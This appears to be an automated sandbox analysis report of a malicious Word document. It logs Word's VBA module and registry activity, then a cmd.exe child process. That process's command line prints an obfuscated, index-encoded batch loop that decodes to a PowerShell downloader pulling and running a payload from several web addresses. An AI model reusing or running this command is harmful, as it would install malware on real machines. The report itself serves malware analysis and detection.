| Module | Get Address | module_name = Unknown module name, function = VarMonthName, address_out = 0x773b23d5 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAdd, address_out = 0x77385934 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAnd, address_out = 0x77385a98 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCat, address_out = 0x773859b4 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDiv, address_out = 0x773de405 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarEqv, address_out = 0x773def07 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarIdiv, address_out = 0x773df00a |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarImp, address_out = 0x773def47 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMod, address_out = 0x773df15e |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMul, address_out = 0x773ddbd4 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarOr, address_out = 0x773decfa |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarPow, address_out = 0x773dea66 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarSub, address_out = 0x773dd332 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarXor, address_out = 0x773dee2e |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAbs, address_out = 0x773dca11 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFix, address_out = 0x773dcc5f |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarInt, address_out = 0x773dcde7 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNeg, address_out = 0x773dc802 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNot, address_out = 0x773dec66 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarRound, address_out = 0x773dd155 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCmp, address_out = 0x7737b0dc |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecAdd, address_out = 0x77395f3e |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecCmp, address_out = 0x77384fd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarBstrCat, address_out = 0x77380d2c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCyMulI4, address_out = 0x773959ed |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarBstrCmp, address_out = 0x7736f8b8 |
|
1 | |
| Module | Get Handle | module_name = ole32.dll, base_address = 0x77500000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = CoCreateInstanceEx, address_out = 0x77549d4e |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = CLSIDFromProgIDEx, address_out = 0x77510782 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-08-01 04:17:53 (Local Time) |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = RequireDeclaration, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = NotifyUserBeforeStateLoss, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnAllErrors, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoMultiByteToWideChar@24, address_out = 0x6713ac03 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\409 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\9 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win32 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win32, data = C:\Program Files\Microsoft Office\Office15\MSWORD.OLB |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32, data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0\win32 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0\win32, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSO.DLL |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-08-01 04:17:54 (Local Time) |
|
2 | |
| System | Get Cursor | x_out = 473, y_out = 836 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-08-01 04:17:54 (Local Time) |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\409 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\9 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win32 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win32, data = C:\Program Files\Microsoft Office\Office15\MSWORD.OLB |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-08-01 04:17:54 (Local Time) |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-08-01 04:17:54 (Local Time) |
|
6 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 597, address_out = 0x6e720dd8 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 600, address_out = 0x6e602b76 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 575, address_out = 0x6e5d8d52 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 608, address_out = 0x6e5d8aa8 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 614, address_out = 0x6e721b68 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 695, address_out = 0x6e5d9060 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 714, address_out = 0x6e721eb2 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 587, address_out = 0x6e7216aa |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 573, address_out = 0x6e5d9327 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 585, address_out = 0x6e7210ab |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 582, address_out = 0x6e721b3d |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 583, address_out = 0x6e7212b8 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 698, address_out = 0x6e5d8468 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 584, address_out = 0x6e721bf4 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-08-01 04:17:55 (Local Time) |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 597, address_out = 0x6e720dd8 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 600, address_out = 0x6e602b76 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 575, address_out = 0x6e5d8d52 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 608, address_out = 0x6e5d8aa8 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 614, address_out = 0x6e721b68 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 695, address_out = 0x6e5d9060 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 714, address_out = 0x6e721eb2 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 587, address_out = 0x6e7216aa |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 573, address_out = 0x6e5d9327 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 585, address_out = 0x6e7210ab |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 582, address_out = 0x6e721b3d |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 583, address_out = 0x6e7212b8 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 698, address_out = 0x6e5d8468 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 584, address_out = 0x6e721bf4 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 597, address_out = 0x6e720dd8 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 600, address_out = 0x6e602b76 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 575, address_out = 0x6e5d8d52 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 608, address_out = 0x6e5d8aa8 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 614, address_out = 0x6e721b68 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 695, address_out = 0x6e5d9060 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 714, address_out = 0x6e721eb2 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 587, address_out = 0x6e7216aa |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 573, address_out = 0x6e5d9327 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 585, address_out = 0x6e7210ab |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 582, address_out = 0x6e721b3d |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 583, address_out = 0x6e7212b8 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 698, address_out = 0x6e5d8468 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x6e530000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 584, address_out = 0x6e721bf4 |
|
1 |
Process #2: cmd.exe
2986
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd /V/C"set pPr=MOANtGXcfYQDJZlJqsHzDVpR-8Ix'$iS{@+vC2o=/(WFbjdh);gekUnaru}P7:E, wy0.\m&&for %D in (22;38;65;51;56;17;47;51;14;14;64;29;55;21;21;39;54;51;65;24;38;44;45;51;7;4;64;3;51;4;68;42;51;44;36;14;30;51;54;4;49;29;15;62;17;39;28;47;4;4;22;61;40;40;35;46;4;38;50;4;68;54;14;40;55;70;66;10;33;47;4;4;22;61;40;40;35;30;7;30;38;57;17;51;54;4;51;56;22;56;30;17;51;17;68;7;38;70;40;16;6;53;57;6;16;33;47;4;4;22;61;40;40;57;54;7;14;51;44;57;46;17;22;30;7;51;68;7;38;70;40;25;67;46;33;47;4;4;22;61;40;40;35;55;14;30;57;54;55;17;68;7;38;70;40;5;25;36;38;38;26;33;47;4;4;22;61;40;40;4;47;51;17;30;14;35;51;56;55;70;51;56;30;7;55;54;51;55;50;14;51;68;7;38;70;40;4;44;28;68;31;22;14;30;4;41;28;33;28;48;49;29;42;6;62;64;39;64;28;60;37;60;28;49;29;23;42;30;39;29;51;54;35;61;4;51;70;22;34;28;69;28;34;29;42;6;62;34;28;68;51;27;51;28;49;8;38;56;51;55;7;47;41;29;54;16;13;64;30;54;64;29;15;62;17;48;32;4;56;66;32;29;55;21;21;68;20;38;65;54;14;38;55;46;43;30;14;51;41;29;54;16;13;63;64;29;23;42;30;48;49;31;4;55;56;4;24;59;56;38;7;51;17;17;64;29;23;42;30;49;44;56;51;55;52;49;58;7;55;4;7;47;32;58;58;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;80)do set Zv=!Zv!!pPr:~%D,1!&&if %D==80 call %Zv:~-362%" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:00, Reason: Child Process |
| Unmonitor | End Time: 00:01:34, Reason: Self Terminated |
| Monitor Duration | 00:00:34 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa34 |
| Parent PID | 0x9a4 (c:\program files\microsoft office\office15\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A38
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00190000 | 0x001f6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000200000 | 0x00200000 | 0x002c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00560fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x0120ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001210000 | 0x01210000 | 0x01372fff | Pagefile Backed Memory | r |
|
|
|
- |
| cmd.exe | 0x4a9d0000 | 0x4aa1bfff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x74120000 | 0x74126fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Threads
Thread 0xa38
2986
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-08-01 10:17:55 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 117250 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\cmd.exe, base_address = 0x4a9d0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x77760000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x777b24c2 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 112, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\BGC6u8Oy yXGxkR\Desktop |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x77760000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x7779ac6c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x777a3ea8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x777b2732 |
|
1 | |
